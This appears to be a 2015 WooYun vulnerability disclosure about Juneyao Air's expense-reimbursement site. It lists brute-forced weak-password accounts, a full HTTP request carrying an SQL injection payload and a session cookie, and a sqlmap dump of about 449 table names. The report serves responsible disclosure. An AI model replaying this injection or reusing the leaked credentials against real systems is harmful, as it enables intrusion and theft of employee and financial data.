乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-09-07: 细节已通知厂商并且等待厂商处理中 2015-09-08: 厂商已经确认,细节仅向厂商公开 2015-09-18: 细节向核心白帽子及相关领域专家公开 2015-09-28: 细节向普通白帽子公开 2015-10-08: 细节向实习白帽子公开 2015-10-23: 细节向公众公开
23333333
URL:费用报销系统后台登陆页面http://expense.juneyaoair.com:8080/Frame/login.aspx
跑字典三个账号被爆出来
zhanghong/123456zhangjun/123456liulei/123456登陆系统
可查看报销信息
发消息页面的查询存在注入,
POST /publicpage/PubOpenListPage.aspx?ac=getdata&UserSqlPar=&q=%20AND%20text%20LIKE%20%27%27%25123%25%27%27%20%20&key=410402&u=3268 HTTP/1.1Host: expense.juneyaoair.com:8080User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:40.0) Gecko/20100101 Firefox/40.0Accept: text/plain, */*; q=0.01Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestReferer: http://expense.juneyaoair.com:8080/publicPage/PubOpenListPage.aspx?key=410402&SourceWhere=&IsSingle=0&IsGetStr=1&rand=1441625347394Content-Length: 45Cookie: ASP.NET_SessionId=cxycaq55bf3db1550s5awdjk; ERCookie=iUserID=3268&cUserCode=zhanghong&cUserName=%e5%bc%a0%e7%ba%a2&cCredit=0.00&DepartmentName=%e8%88%aa%e6%9d%90%e7%ae%a1%e7%90%86%e5%a4%84&DepartmentID=36&DepartmentCode=010502&CompanyIDList=&CompanyCodeList=&RoleIDList=2%2c266&RoleCodeList=002%2c266&LanguageID=1&s=G3a0FvOSXESM/+tGAwidzZ4KVf3NqYb6&Title=¤tCompId=1&CompanyIDList2=1X-Forwarded-For: 8.8.8.8Connection: keep-alivePragma: no-cacheCache-Control: no-cachepageIndex=0&pageSize=10&sortField=&sortOrder=
参数q存在注入sqlmap跑,涉及12个库
当前数据库有400多个表
Database: EXPENSE[449 tables]+--------------------------------+| AFR_AbNormalDetail_CZ || AFR_AbNormalDetail_SK || AFR_AbNormalDetail_Sum || AFR_AbNormalMain || AFR_AbNormaldetail_bak || AFR_AbNormaldetail_bak || AFR_CusDetail_CW || AFR_CusDetail_CW || AFR_CusDetail_CZ || AFR_CusDetail_FK || AFR_CusDetail_SK || AFR_CusMain || AFR_FixedDetail_CW || AFR_FixedDetail_CW || AFR_FixedDetail_CZ || AFR_FixedDetail_FK || AFR_FixedDetail_SK || AFR_FixedMain || AFR_MarketingDetail_CW || AFR_MarketingDetail_CW || AFR_MarketingDetail_CZ || AFR_MarketingDetail_FK || AFR_MarketingDetail_SK || AFR_MarketingMain || AFR_NormalDetail_CW || AFR_NormalDetail_CW || AFR_NormalDetail_CZ || AFR_NormalDetail_FK || AFR_NormalDetail_SK || AFR_NormalDetail_Sum || AFR_NormalMain || AFR_OfficeDetail_CW || AFR_OfficeDetail_CW || AFR_OfficeDetail_CZ || AFR_OfficeDetail_FK || AFR_OfficeDetail_SK || AFR_OfficeMain || AFR_ProjectDetail_CW || AFR_ProjectDetail_CW || AFR_ProjectDetail_CZ || AFR_ProjectDetail_FK || AFR_ProjectDetail_SK || AFR_ProjectDetail_Sum || AFR_ProjectMain || AFR_PublicNormalDetail_CZ || AFR_PublicNormalDetail_CZ || AFR_PublicNormalDetail_SK || AFR_PublicNormalMain || AFR_PurDetail_CW || AFR_PurDetail_CW || AFR_PurDetail_CZ || AFR_PurDetail_FK || AFR_PurDetail_SK || AFR_PurMain || AFR_ServeDetail_CW || AFR_ServeDetail_CW || AFR_ServeDetail_CZ || AFR_ServeDetail_SK || AFR_ServeDetail_Sum || AFR_ServeMain || AFR_TravelDetail_BZ || AFR_TravelDetail_BZ || AFR_TravelDetail_CW || AFR_TravelDetail_CZ || AFR_TravelDetail_FK || AFR_TravelDetail_SK || AFR_TravelDetail_Sum || AFR_TravelDetail_ZS || AFR_TravelDetail_dy || AFR_TravelMain || AFR_VehicleDetail_CW || AFR_VehicleDetail_CW || AFR_VehicleDetail_CZ || AFR_VehicleDetail_FK || AFR_VehicleDetail_SK || AFR_VehicleMain || BorrowDetail_SK || BorrowDetail_SK || BorrowMain || Borrow_BackDetail || Borrow_BackMain || Borrow_BackOffLineDetail || Borrow_BackOffLineMain || Borrow_V_Info || Brrow_Report_Where || BudAdjustDetail || BudAdjustMain || BudConfig || BudPeriod || BudPeriodType || BudPeriodYear || BudPlanChangeLog || BudPlanMain_Test || BudPlanMain_Test || BudPlan_Test || BudPlan_Test || BudSolutionMap || BudSolutionMap || Bud_Bill_SqlField || Bud_Bill_SqlField || Bud_DeptMergeDetail || Bud_DeptMergeMain || Bud_MappingColumn || Bud_MappingDetail || Bud_MappingMain || Bud_Script || Bud_SpecialApproveDetail_CZ || Bud_SpecialApproveDetail_CZ || Bud_SpecialApproveMain || Bud_StyleType_Bill || Bud_StyleType_Bill || Bud_StyleType_WDL || Bud_StyleType_WDL || Bud_Style_Cell_Solu || Bud_Style_Cell_Solu || Bud_Style_Cell_Solu || Bud_Style_File || Bud_Style_Navigation || Bud_Style_Period || Bud_Style_User || Bud_Style_WDGroupDetail || Bud_Style_WDGroupDetail || Bud_Style_WDMap || Bud_Style_WD_CJ || Bud_V_Plan || Bud_WDL || Bud_WDL || EB_Area || EB_BankFileConfig || EB_BankFileConfig || EB_CashTable || EB_Code || EB_CostType || EB_Currency || EB_CusContactAdd || EB_CusContactAdd || EB_Customer || EB_CustomerType || EB_DateDay || EB_DateMonth || EB_DateYear || EB_Document || EB_FileUploadLog || EB_IndustryType || EB_InfoMain || EB_InfoMain || EB_ItemAgreeMentDetail_CZ || EB_ItemAgreeMentDetail_CZ || EB_ItemAgreeMentDetail_CZ || EB_ItemAgreeMentMain || EB_ItemStartDetail || EB_ItemStartMain || EB_Job || EB_PaymentType || EB_PrinterList || EB_RateAdjustLog || EB_ReimbStandard || EB_SZXM || EB_SZ_KM || EB_SubsidyStandard || EB_SuppContact || EB_Supplier || EB_SupplierType || EB_TravelBT || EB_TravelCW || EB_TravelZSBZ || FAGL_CashTable || Fa_CollectionCheckDetail || Fa_CollectionCheckMain || Fa_CollectionDetail || Fa_CollectionMain || Fa_GLBooks || Fa_GLCodeConfigDetail || Fa_GLCodeConfigMain || Fa_GLCodeMapMain || Fa_GLCodeMapMain || Fa_GLDataSource || Fa_GLDsign || Fa_GLExcelImport || Fa_GLKisVoucherError || Fa_GLKisVoucherError || Fa_GLMainSql || Fa_GLRPCompayS || Fa_GLRPDetail_Back || Fa_GLRPDetail_Back || Fa_GLRPMain_Back || Fa_GLRPMain_Back || Fa_GLServers || Fa_GLUFaccvouchError || Fa_GLUFaccvouchError || Fa_GLVoucherTemplate || Fa_GetPricePolicy || Fa_OtherPayDetail_CZ || Fa_OtherPayDetail_CZ || Fa_OtherPayMain || Fa_PayMoneyDetail_CZ || Fa_PayMoneyDetail_CZ || Fa_PayMoneyDetail_SK || Fa_PayMoneyMain || Fa_PaymentCheckDetail || Fa_PaymentCheckMain || Fa_PaymentDetail || Fa_PaymentMain || Fa_Test || Fa_V_FKDetail || Fa_VoucherTmpToGL || OA_ItemDocumentMain || OA_Overtime || OA_RenovateMain || OA_ServiceList || OA_TravelRequest || OA_VacationMain2 || OA_VacationMain2 || Per_AddedMenu || Project_Doc || Project_Mediate || Project_StartDetail_His || Project_StartDetail_His || Project_StartMain || Project_Step || Project_TaskPlanDetail || Project_TaskPlanMain || Project_TelnetServiceRecord || Project_VS_Doc || Report_V_BaseApport || Report_V_CW || Report_V_Req || Report_V_RetApprove || Report_V_SR || Report_V_bxx || Report_V_travel || Report_V_wb_item || Req_CusDetail_JK || Req_CusDetail_JK || Req_CusMain || Req_FixedDetail_JK || Req_FixedDetail_JK || Req_FixedMain || Req_MarketingDetail_JK || Req_MarketingDetail_JK || Req_MarketingMain || Req_NormalDetail_JK || Req_NormalDetail_JK || Req_NormalMain || Req_OfficeDetail_JK || Req_OfficeDetail_JK || Req_OfficeMain || Req_ProjectDetail_JK || Req_ProjectDetail_JK || Req_ProjectMain || Req_PurDetail || Req_PurMain || Req_ServeDetail || Req_ServeMain || Req_TravelDetail_JK || Req_TravelDetail_JK || Req_TravelDetail_ZS || Req_TravelMain || Req_VehicleDetail_JK || Req_VehicleDetail_JK || Req_VehicleMain || SSP_Book || SSP_FYType || SSP_UploadData || SSP_UploadFile || SSP_User || Sa_SRDetail || Sa_SRMain || Sys_Alert || Sys_AlertVSRole || Sys_ApproveAllowButton || Sys_ApproveBillApproveLog || Sys_ApproveCheckItemBeforePass || Sys_ApproveFlowList || Sys_ApproveMailSend || Sys_ApproveSubAccess || Sys_ApproveSubCondition || Sys_ApproveSubitem || Sys_ApproveWaiteApproveList || Sys_ApproveedAllowEditCols || Sys_BDCheck || Sys_BillHelperMsg || Sys_BillHelperMsgVsBill || Sys_BillHelperMsgVsRole || Sys_BillPrintList || Sys_BillVSReport || Sys_Company || Sys_Config || Sys_CopyDetail || Sys_CopyMain || Sys_Credit || Sys_CreditVSobject || Sys_CtrCompetenceAccess || Sys_CtrCompetenceDetail || Sys_CtrCompetenceMain || Sys_CtrJsCompetenceAccess || Sys_CtrJsCompetenceCondition || Sys_CtrJsCompetenceDetail || Sys_DataCheckItem || Sys_DataCheckVsToolBar || Sys_DataCompetenceAccess || Sys_DataCompetenceBaseVsBill || Sys_DataCompetenceCondition || Sys_DataCompetenceDetail || Sys_DefineColConfig || Sys_Dept || Sys_DeskPanel || Sys_DeskPanelVSRole || Sys_Dic || Sys_ExchangeRate || Sys_FeedBack || Sys_Fn || Sys_GridDetail || Sys_GridMain || Sys_ImportDetail || Sys_ImportMain || Sys_ImportValidItem || Sys_InfoMain || Sys_InfoMain || Sys_LanguageDetail || Sys_LanguageDetail || Sys_LogForBDError || Sys_LogForBud || Sys_LogForGL || Sys_LogForSaveBackUp || Sys_LogForSaveBackUp || Sys_LogForSqlEvent || Sys_LogForWF || Sys_Log_11 || Sys_Log_11 || Sys_Log_12 || Sys_Log_13 || Sys_Log_14 || Sys_MaxBillID || Sys_Menu || Sys_Message || Sys_MessageSendAccount || Sys_MessageSendLog || Sys_MessageSendMode || Sys_MessageSetting || Sys_MessageTask || Sys_MessageType || Sys_MessageVSReciver || Sys_Num || Sys_PageDetail || Sys_PageMain || Sys_ProgramList || Sys_PubPageForList || Sys_QFieldHideVSUid || Sys_QTemplateDetail || Sys_QTemplateDetail || Sys_QTemplateMain || Sys_QueryPageDetail || Sys_QueryPageMain || Sys_Resource || Sys_ResourceType || Sys_Role || Sys_RoleVSAction || Sys_RoleVSSolution || Sys_RoleVsBillColumn || Sys_RoleVsCompany || Sys_SQLFromColNameMatch || Sys_SQLFromPartDetail || Sys_SQLFromPartMain || Sys_SQLFromPartType || Sys_SQLWhereDetail || Sys_SQLWhereType || Sys_SSOConfig || Sys_SecondActionSql || Sys_SecondProcessAccess || Sys_SysNoRules || Sys_ToolBarList || Sys_ToolBarVSBill || Sys_UserVSDept || Sys_UserVSJob || Sys_UserVSRole || Sys_UserVsBillColumn || Sys_V_AllBillStatus || Sys_V_ApproveList || Sys_V_Area || Sys_V_Code || Sys_V_CostType || Sys_V_CtrCompetence || Sys_V_Dept_VS_User || Sys_V_Dept_VS_User || Sys_V_ItemDocument || Sys_V_ItemDocument || Sys_V_ItemStart || Sys_V_Job || Sys_V_Menu || Sys_V_PaymentList || Sys_V_Period || Sys_V_RoleVSUser || Sys_V_Role_VS_User || Sys_V_SZXM || Sys_V_TravelFor_RP || Sys_V_TravelUnionAll || Sys_V_UserInfo || Sys_V_UserRoleDept || Sys_V_WFStepAccess || Sys_WFAllowEditColsBackUp || Sys_WFAllowEditColsBackUp || Sys_WFAppOpinion || Sys_WFApproveLog || Sys_WFBillVSFlow || Sys_WFCheckList || Sys_WFConsign || Sys_WFDic || Sys_WFEventList || Sys_WFFlowType || Sys_WFFlowVSCheck || Sys_WFFlowVSEvent || Sys_WFMailCCUser || Sys_WFMailTempVSFlow || Sys_WFMailTemplateDetail || Sys_WFMailTemplateDetail || Sys_WFMonitorLog || Sys_WFStepAccessDynamic || Sys_WFStepAccessDynamic || Sys_WFStepAccessDynamic || Sys_WFStepDynamic || Sys_WFStepRelation || Sys_WFTransferApp || Sys_WFWaiteApprove || Sys_WFWebPageDetail || Sys_WFWebPageMain || Sys_Website || Test_List || Test_SetBillCount || Tran_CenterError || Tran_EB_Code || Tran_NC_ARAP_DJFB || Tran_NC_ARAP_DJZB || Tran_Sys_Dept || Tran_Sys_Role || Tran_Sys_User || V_AFR_TravelDetail || Z_JiShuLevel || aaa || aaa || bbb || nc || sys_MessageReciverType || sys_PageDataSourceSql || sys_user_bak || sys_user_bak || tmp_user || u_tmp || 期初借款 |+--------------------------------+
8000多个员工的信息包括账号密码应该都在里面,就不证明了
这么多数据,并没有脱裤,求20rank!!!
危害等级:高
漏洞Rank:16
确认时间:2015-09-08 15:43
漏洞已经确认
暂无